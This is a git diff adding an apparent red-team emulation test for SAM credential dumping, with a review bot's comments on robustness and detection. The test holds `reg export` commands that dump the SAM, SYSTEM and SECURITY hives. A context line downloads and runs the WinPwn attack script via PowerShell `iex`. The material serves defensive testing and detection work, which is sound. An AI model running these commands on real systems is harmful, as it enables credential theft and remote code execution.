diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml
index 5b7ea970..2da85875 100644
--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -172,3 +172,21 @@ atomic_tests:
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') samfile -consoleoutput -noninteractive
 name: powershell
+
+- name: Dumping of SAM, creds, and secrets(Reg Export)
+ description: |
+ Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Used reg export to execute this behavior
+ Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ reg export HKLM\sam %temp%\sam
+ reg export HKLM\system %temp%\system
+ reg export HKLM\security %temp%\security
+ cleanup_command: |
+ del %temp%\sam >nul 2> nul
+ del %temp%\system >nul 2> nul
+ del %temp%\security >nul 2> nul
+ name: command_prompt
+ elevation_required: true
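Review bot: The three `reg export` lines in the new test's `command` block will stall on the interactive "Overwrite? (Yes/No)" prompt if a previous run left `%temp%\sam`, `%temp%\system` or `%temp%\security` behind (for example when `cleanup_command` was skipped), so a non-interactive runner can hang; add the `/y` switch to each, e.g. `reg export HKLM\sam %temp%\sam /y`, `reg export HKLM\system %temp%\system /y`, `reg export HKLM\security %temp%\security /y`. The `description` should also say plainly that the exported hive files contain credential material and that `cleanup_command` must be run to remove them, and its wording needs tightening — "Used reg export to execute this behavior" and "three files named, sam, system and security" read awkwardly; something like "This test uses reg export to write the SAM, SYSTEM and SECURITY hives to files named sam, system and security in %temp%; run the cleanup command to delete them" is clearer. It would help detection engineers if the description noted the observable: a `reg.exe export` process-creation event whose command line references `HKLM\sam`, `HKLM\system` or `HKLM\security`. Whether this repository expects a per-test GUID or other required fields on new atomics cannot be confirmed from this hunk, so check the neighbouring tests for any missing metadata.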